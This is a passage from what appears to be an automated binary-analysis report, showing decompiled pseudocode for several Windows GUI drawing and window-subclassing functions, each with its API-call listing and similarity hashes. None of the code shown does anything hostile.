                                                                        							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t172, 0xfffffffc);
                                                                        							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
                                                                        							_t151 = GetWindow(_t151, 2);
                                                                        						}
                                                                        						_t171 = _t151;
                                                                        						 *(_v8 + 0x240) = _t171;
                                                                        						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t171, 0xfffffffc);
                                                                        						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
                                                                        					}
                                                                        				}
                                                                        				_t87 =  *0x495a04; // 0x496b70
                                                                        				if( *_t87 != 0 &&  *(_v8 + 0x240) != 0) {
                                                                        					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_v8 + 0x27c)) == 0) {
                                                                        					_t89 = _v8;
                                                                        					if( *((intOrPtr*)(_t89 + 0x278)) != 0) {
                                                                        						_t92 = E004436E8( *((intOrPtr*)(_v8 + 0x278)));
                                                                        						_t89 = PostMessageA(E0043CC2C(_v8), 0x402, 0, _t92);
                                                                        					}
                                                                        					return _t89;
                                                                        				} else {
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x20))();
                                                                        					 *((char*)(_v8 + 0x280)) = 1;
                                                                        					 *[fs:eax] = _t176;
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 8))( *[fs:eax], 0x4789fe, _t174);
                                                                        					_t149 = E0041521C( *((intOrPtr*)(_v8 + 0x284))) - 1;
                                                                        					if(_t149 >= 0) {
                                                                        						_t150 = _t149 + 1;
                                                                        						_t170 = 0;
                                                                        						do {
                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x2c))();
                                                                        							_t170 = _t170 + 1;
                                                                        							_t150 = _t150 - 1;
                                                                        						} while (_t150 != 0);
                                                                        					}
                                                                        					E0040BAFC(_v8 + 0x27c);
                                                                        					E004366A0(_v8);
                                                                        					_pop(_t162);
                                                                        					 *[fs:eax] = _t162;
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x24))(0x478a05);
                                                                        					_t117 = _v8;
                                                                        					 *((char*)(_t117 + 0x280)) = 0;
                                                                        					return _t117;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0042D3EC: SendMessageA.USER32 ref: 0042D40C
                                                                        • GetWindow.USER32(00000000,00000005), ref: 00478818
                                                                        • GetWindowLongA.USER32 ref: 00478836
                                                                        • SetWindowLongA.USER32 ref: 0047885A
                                                                        • GetWindow.USER32(00000000,00000005), ref: 0047887D
                                                                        • GetWindow.USER32(00000000,00000000), ref: 00478883
                                                                        • GetWindowLongA.USER32 ref: 004788AC
                                                                        • SetWindowLongA.USER32 ref: 004788D0
                                                                        • GetWindow.USER32(00000000,00000002), ref: 004788D8
                                                                        • GetWindowLongA.USER32 ref: 004788ED
                                                                        • SetWindowLongA.USER32 ref: 00478911
                                                                        • SendMessageA.USER32 ref: 0047893F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Long$MessageSend
                                                                        • String ID: pkI
                                                                        • API String ID: 1593136606-582613530
                                                                        • Opcode ID: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction ID: c93d556c733353f28b80892d9748ad900ab6ec26727c7c5ce3df2aa97b74d364
                                                                        • Opcode Fuzzy Hash: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction Fuzzy Hash: CB61F074A04105EFDB10EB99C989E9D77F4EB09314F2541F9F508AB3A2CB74AE40DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E004245C4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				void* _v12;
                                                                        				char _v13;
                                                                        				struct tagPOINT _v21;
                                                                        				struct HDC__* _v28;
                                                                        				void* _v32;
                                                                        				intOrPtr _t74;
                                                                        				struct HDC__* _t76;
                                                                        				signed int _t78;
                                                                        				signed int _t79;
                                                                        				char _t80;
                                                                        				void* _t87;
                                                                        				struct HDC__* _t110;
                                                                        				void* _t131;
                                                                        				struct HDC__* _t155;
                                                                        				intOrPtr* _t159;
                                                                        				intOrPtr _t167;
                                                                        				signed int _t168;
                                                                        				intOrPtr _t171;
                                                                        				intOrPtr _t173;
                                                                        				intOrPtr _t175;
                                                                        				int* _t179;
                                                                        				intOrPtr _t181;
                                                                        				void* _t183;
                                                                        				void* _t184;
                                                                        				intOrPtr _t185;
                                                                        
                                                                        				_t160 = __ecx;
                                                                        				_t183 = _t184;
                                                                        				_t185 = _t184 + 0xffffffe4;
                                                                        				_t179 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t159 = __eax;
                                                                        				_t181 =  *((intOrPtr*)(__eax + 0x28));
                                                                        				_t167 =  *0x424810; // 0xf
                                                                        				E00420804(_v8, __ecx, _t167);
                                                                        				E00424C34(_t159);
                                                                        				_v12 = 0;
                                                                        				_v13 = 0;
                                                                        				_t74 =  *((intOrPtr*)(_t181 + 0x10));
                                                                        				if(_t74 != 0) {
                                                                        					_push(0xffffffff);
                                                                        					_push(_t74);
                                                                        					_t155 =  *(_v8 + 4);
                                                                        					_push(_t155);
                                                                        					L00406C5C();
                                                                        					_v12 = _t155;
                                                                        					_push( *(_v8 + 4));
                                                                        					L00406C2C();
                                                                        					_v13 = 1;
                                                                        				}
                                                                        				_push(0xc);
                                                                        				_t76 =  *(_v8 + 4);
                                                                        				_push(_t76);
                                                                        				L00406B8C();
                                                                        				_push(_t76);
                                                                        				_push(0xe);
                                                                        				_t78 =  *(_v8 + 4);
                                                                        				L00406B8C();
                                                                        				_t168 = _t78;
                                                                        				_t79 = _t168 * _t78;
                                                                        				if(_t79 > 8) {
                                                                        					L4:
                                                                        					_t80 = 0;
                                                                        				} else {
                                                                        					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
                                                                        					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
                                                                        						_t80 = 1;
                                                                        					} else {
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				if(_t80 == 0) {
                                                                        					if(E00424950(_t159) == 0) {
                                                                        						SetStretchBltMode(E00420730(_v8), 3);
                                                                        					}
                                                                        				} else {
                                                                        					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                        					SetStretchBltMode( *(_v8 + 4), 4);
                                                                        					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                        				}
                                                                        				_push(_t183);
                                                                        				_push(0x424801);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t185;
                                                                        				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
                                                                        					E00424BD4(_t159, _t160);
                                                                        				}
                                                                        				_t87 = E00424894(_t159);
                                                                        				_t171 =  *0x424810; // 0xf
                                                                        				E00420804(_t87, _t160, _t171);
                                                                        				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
                                                                        					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00424894(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
                                                                        					_pop(_t173);
                                                                        					 *[fs:eax] = _t173;
                                                                        					_push(E00424808);
                                                                        					if(_v13 != 0) {
                                                                        						_push(0xffffffff);
                                                                        						_push(_v12);
                                                                        						_t110 =  *(_v8 + 4);
                                                                        						_push(_t110);
                                                                        						L00406C5C();
                                                                        						return _t110;
                                                                        					}
                                                                        					return 0;
                                                                        				} else {
                                                                        					_v32 = 0;
                                                                        					_v28 = 0;
                                                                        					_push(_t183);
                                                                        					_push(0x424796);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t185;
                                                                        					L00406AE4();
                                                                        					_v28 = E00420B28(0);
                                                                        					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
                                                                        					E00420CCC( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00424894(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
                                                                        					_t131 = 0;
                                                                        					_t175 = 0;
                                                                        					 *[fs:eax] = _t175;
                                                                        					_push(0x4247db);
                                                                        					if(_v32 != 0) {
                                                                        						_t131 = SelectObject(_v28, _v32);
                                                                        					}
                                                                        					if(_v28 != 0) {
                                                                        						return DeleteDC(_v28);
                                                                        					}
                                                                        					return _t131;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00424C34: 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        • 72E7B410.GDI32(?,?,000000FF), ref: 00424606
                                                                        • 72E7B150.GDI32(?,?,?,000000FF), ref: 00424615
                                                                        • 72E7AD70.GDI32(?,0000000C), ref: 00424627
                                                                        • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 004246AD
                                                                        • 72E7A590.GDI32(00000000,00000000,00424796,?,?,0000000E,00000000,?,0000000C), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424781
                                                                        • DeleteDC.GDI32(00000000), ref: 00424790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                        • String ID:
                                                                        • API String ID: 2051775979-0
                                                                        • Opcode ID: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction ID: 9c0590f5a5351f0b339d81a561568dd9393c85642e681a1d1bb2e02d323cf42c
                                                                        • Opcode Fuzzy Hash: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction Fuzzy Hash: D4716AB5B00215AFDB10EFA9D985F5ABBF8EB49304F51856AB508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 51%
                                                                        			E00420B38(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				void* _v20;
                                                                        				int _v24;
                                                                        				struct HDC__* _v28;
                                                                        				struct HDC__* _v32;
                                                                        				int _v48;
                                                                        				int _v52;
                                                                        				void _v56;
                                                                        				int _t37;
                                                                        				void* _t41;
                                                                        				int _t43;
                                                                        				void* _t47;
                                                                        				void* _t72;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t80;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t89;
                                                                        
                                                                        				_t87 = _t88;
                                                                        				_t89 = _t88 + 0xffffffcc;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t71 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_push(0);
                                                                        				L00406AE4();
                                                                        				_v28 = __eax;
                                                                        				_push(0);
                                                                        				L00406AE4();
                                                                        				_v32 = __eax;
                                                                        				_push(_t87);
                                                                        				_push(0x420c86);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t89;
                                                                        				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                                                        				if(__ecx == 0) {
                                                                        					_push(0);
                                                                        					L00406EB4();
                                                                        					_v24 = _t37;
                                                                        					if(_v24 == 0) {
                                                                        						E00420A80(__ecx);
                                                                        					}
                                                                        					_push(_t87);
                                                                        					_push(0x420bf5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t89;
                                                                        					_push(_v12);
                                                                        					_push(_v16);
                                                                        					_t41 = _v24;
                                                                        					_push(_t41);
                                                                        					L00406ADC();
                                                                        					_v20 = _t41;
                                                                        					if(_v20 == 0) {
                                                                        						E00420A80(_t71);
                                                                        					}
                                                                        					_pop(_t79);
                                                                        					 *[fs:eax] = _t79;
                                                                        					_push(0x420bfc);
                                                                        					_t43 = _v24;
                                                                        					_push(_t43);
                                                                        					_push(0);
                                                                        					L00407124();
                                                                        					return _t43;
                                                                        				} else {
                                                                        					_push(0);
                                                                        					_push(1);
                                                                        					_push(1);
                                                                        					_push(_v12);
                                                                        					_t47 = _v16;
                                                                        					_push(_t47);
                                                                        					L00406ACC();
                                                                        					_v20 = _t47;
                                                                        					if(_v20 != 0) {
                                                                        						_t72 = SelectObject(_v28, _v8);
                                                                        						_t85 = SelectObject(_v32, _v20);
                                                                        						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                                        						if(_t72 != 0) {
                                                                        							SelectObject(_v28, _t72);
                                                                        						}
                                                                        						if(_t85 != 0) {
                                                                        							SelectObject(_v32, _t85);
                                                                        						}
                                                                        					}
                                                                        					_pop(_t80);
                                                                        					 *[fs:eax] = _t80;
                                                                        					_push(E00420C8D);
                                                                        					DeleteDC(_v28);
                                                                        					return DeleteDC(_v32);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • 72E7A590.GDI32(00000000), ref: 00420B4F
                                                                        • 72E7A590.GDI32(00000000,00000000), ref: 00420B59
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00420B79
                                                                        • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420B90
                                                                        • 72E7AC50.USER32(00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420B9C
                                                                        • 72E7A520.GDI32(00000000,?,?,00000000,00420BF5,?,00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420BC9
                                                                        • 72E7B380.USER32(00000000,00000000,00420BFC,00000000,00420BF5,?,00000000,?,00000018,?,00000000,00420C86,?,00000000,00000000), ref: 00420BEF
                                                                        • SelectObject.GDI32(?,?), ref: 00420C0A
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C19
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420C45
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C53
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C61
                                                                        • DeleteDC.GDI32(?), ref: 00420C77
                                                                        • DeleteDC.GDI32(?), ref: 00420C80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                        • String ID:
                                                                        • API String ID: 956127455-0
                                                                        • Opcode ID: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction ID: 6c023867643c450f6ef70e7d5508629062c5f15d3a4c00019323062e5ea54a1e
                                                                        • Opcode Fuzzy Hash: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction Fuzzy Hash: 9E4120B1E44215AFDB10EBE5DC46FAFB7FCEB08704F514426B605F7281C678A9408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E0043DA84(intOrPtr* __eax, intOrPtr __edx) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagRECT _v48;
                                                                        				void* _v64;
                                                                        				struct HDC__* _t115;
                                                                        				void* _t166;
                                                                        				intOrPtr* _t188;
                                                                        				intOrPtr* _t191;
                                                                        				void* _t200;
                                                                        				intOrPtr _t207;
                                                                        				signed int _t224;
                                                                        				void* _t227;
                                                                        				void* _t229;
                                                                        				intOrPtr _t230;
                                                                        
                                                                        				_t227 = _t229;
                                                                        				_t230 = _t229 + 0xffffffc4;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                                        					_t115 = E0043CC2C(_v8);
                                                                        					_push(_t115);
                                                                        					L00406FC4();
                                                                        					_v16 = _t115;
                                                                        					_push(_t227);
                                                                        					_push(0x43dcea);
                                                                        					_push( *[fs:edx]);
                                                                        					 *[fs:edx] = _t230;
                                                                        					GetClientRect(E0043CC2C(_v8),  &_v32);
                                                                        					GetWindowRect(E0043CC2C(_v8),  &_v48);
                                                                        					MapWindowPoints(0, E0043CC2C(_v8),  &_v48, 2);
                                                                        					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                                        					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					if( *(_v8 + 0x165) != 0) {
                                                                        						_t200 = 0;
                                                                        						if( *(_v8 + 0x163) != 0) {
                                                                        							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                                        						}
                                                                        						if( *(_v8 + 0x164) != 0) {
                                                                        							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
                                                                        						}
                                                                        						_t224 = GetWindowLongA(E0043CC2C(_v8), 0xfffffff0);
                                                                        						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                                        							_v48.left = _v48.left - _t200;
                                                                        						}
                                                                        						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                                        							_v48.top = _v48.top - _t200;
                                                                        						}
                                                                        						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                                        							_v48.right = _v48.right + _t200;
                                                                        						}
                                                                        						if((_t224 & 0x00200000) != 0) {
                                                                        							_t191 =  *0x495998; // 0x496a9c
                                                                        							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
                                                                        						}
                                                                        						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                                        							_v48.bottom = _v48.bottom + _t200;
                                                                        						}
                                                                        						if((_t224 & 0x00100000) != 0) {
                                                                        							_t188 =  *0x495998; // 0x496a9c
                                                                        							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
                                                                        						}
                                                                        						DrawEdge(_v16,  &_v48,  *(0x47a978 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x47a988 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x47a998 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x47a9a8 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                                        					}
                                                                        					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                                        					FillRect(_v16,  &_v48, E0041FC84( *((intOrPtr*)(_v8 + 0x170))));
                                                                        					_pop(_t207);
                                                                        					 *[fs:eax] = _t207;
                                                                        					_push(0x43dcf1);
                                                                        					_push(_v16);
                                                                        					_t166 = E0043CC2C(_v8);
                                                                        					_push(_t166);
                                                                        					L00407124();
                                                                        					return _t166;
                                                                        				} else {
                                                                        					return  *((intOrPtr*)( *_v8 - 0x10))();
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • 72E7B080.USER32(00000000), ref: 0043DAB8
                                                                        • GetClientRect.USER32 ref: 0043DADB
                                                                        • GetWindowRect.USER32 ref: 0043DAED
                                                                        • MapWindowPoints.USER32 ref: 0043DB03
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DB18
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043DB31
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 0043DB4F
                                                                        • GetWindowLongA.USER32 ref: 0043DBA5
                                                                        • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043DC71
                                                                        • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043DC8A
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DCA9
                                                                        • FillRect.USER32 ref: 0043DCC5
                                                                        • 72E7B380.USER32(00000000,?,0043DCF1,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0043DCE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                        • String ID:
                                                                        • API String ID: 156109915-0
                                                                        • Opcode ID: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction ID: 7968770457f43ada0f31e19ad590de613830df88c21d9f0d7a04e4ea0399ff5a
                                                                        • Opcode Fuzzy Hash: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction Fuzzy Hash: E4812871E00208AFDB01DBA8D985EEEB7F9AF09314F1540A6F518F7252C779AE44CB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E0041FEC0(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr* _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				int _v24;
                                                                        				long _v28;
                                                                        				long _v32;
                                                                        				struct HDC__* _v36;
                                                                        				intOrPtr* _v40;
                                                                        				void* _v44;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t116;
                                                                        				void* _t124;
                                                                        				struct HDC__* _t191;
                                                                        				int* _t196;
                                                                        				intOrPtr _t204;
                                                                        				intOrPtr _t208;
                                                                        				intOrPtr _t209;
                                                                        				intOrPtr _t210;
                                                                        				int _t216;
                                                                        				int* _t218;
                                                                        				void* _t221;
                                                                        				void* _t223;
                                                                        				intOrPtr _t224;
                                                                        
                                                                        				_t198 = __ecx;
                                                                        				_t221 = _t223;
                                                                        				_t224 = _t223 + 0xffffffd8;
                                                                        				_v12 = __ecx;
                                                                        				_t218 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t196 = _a8;
                                                                        				if(_v12 != 0) {
                                                                        					E00420398(_v8);
                                                                        					 *[fs:eax] = _t224;
                                                                        					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x420166, _t221);
                                                                        					_t204 =  *0x420178; // 0x9
                                                                        					E00420804(_v8, __ecx, _t204);
                                                                        					E00420398(E00424894(_v12));
                                                                        					_push(_t221);
                                                                        					_push(0x420141);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t224;
                                                                        					_v20 = _t218[2] -  *_t218;
                                                                        					_v24 = _t218[3] - _t218[1];
                                                                        					_t216 = _t196[2] -  *_t196;
                                                                        					_v16 = _t196[3] - _t196[1];
                                                                        					if(E00424980(_v12, _t198) != _a4) {
                                                                        						_v40 = E004242CC(1);
                                                                        						_t198 =  *_v40;
                                                                        						 *((intOrPtr*)( *_v40 + 8))();
                                                                        						E00424AF4(_v40, _a4, __eflags);
                                                                        						_t116 = E00424894(_v40);
                                                                        						_t208 =  *0x42017c; // 0x1
                                                                        						E00420804(_t116,  *_v40, _t208);
                                                                        						_v36 =  *((intOrPtr*)(E00424894(_v40) + 4));
                                                                        						__eflags = 0;
                                                                        						_v44 = 0;
                                                                        					} else {
                                                                        						_v40 = 0;
                                                                        						_t191 =  *((intOrPtr*)( *_v12 + 0x68))();
                                                                        						_v44 = _t191;
                                                                        						_push(0);
                                                                        						L00406AE4();
                                                                        						_v36 = _t191;
                                                                        						_v44 = SelectObject(_v36, _v44);
                                                                        					}
                                                                        					_push(_t221);
                                                                        					_push(0x42011f);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t224;
                                                                        					_t124 = E00424894(_v12);
                                                                        					_t209 =  *0x42017c; // 0x1
                                                                        					E00420804(_t124, _t198, _t209);
                                                                        					if(E0041FD64( *((intOrPtr*)(_v8 + 0x14))) != 1) {
                                                                        						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24,  *(E00424894(_v12) + 4),  *_t196, _t196[1], _t216, _v16, 0xcc0020);
                                                                        						_v32 = SetTextColor( *(_v8 + 4), 0);
                                                                        						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
                                                                        						StretchBlt( *(_v8 + 4),  *_t218, _t218[1], _v20, _v24, _v36,  *_t196, _t196[1], _t216, _v16, 0xe20746);
                                                                        						SetTextColor( *(_v8 + 4), _v32);
                                                                        						SetBkColor( *(_v8 + 4), _v28);
                                                                        					} else {
                                                                        						E00420CCC( *(_v8 + 4), _t196, _t218[1],  *_t218, _t216, _t218, _t196[1],  *_t196, _v36, _v16, _t216, _t196[1],  *_t196,  *(E00424894(_v12) + 4), _v24, _v20);
                                                                        					}
                                                                        					_pop(_t210);
                                                                        					 *[fs:eax] = _t210;
                                                                        					_push(E00420126);
                                                                        					if(_v40 == 0) {
                                                                        						__eflags = _v44;
                                                                        						if(_v44 != 0) {
                                                                        							SelectObject(_v36, _v44);
                                                                        						}
                                                                        						return DeleteDC(_v36);
                                                                        					} else {
                                                                        						return E004035DC(_v40);
                                                                        					}
                                                                        				}
                                                                        				return __eax;
                                                                        			}































                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
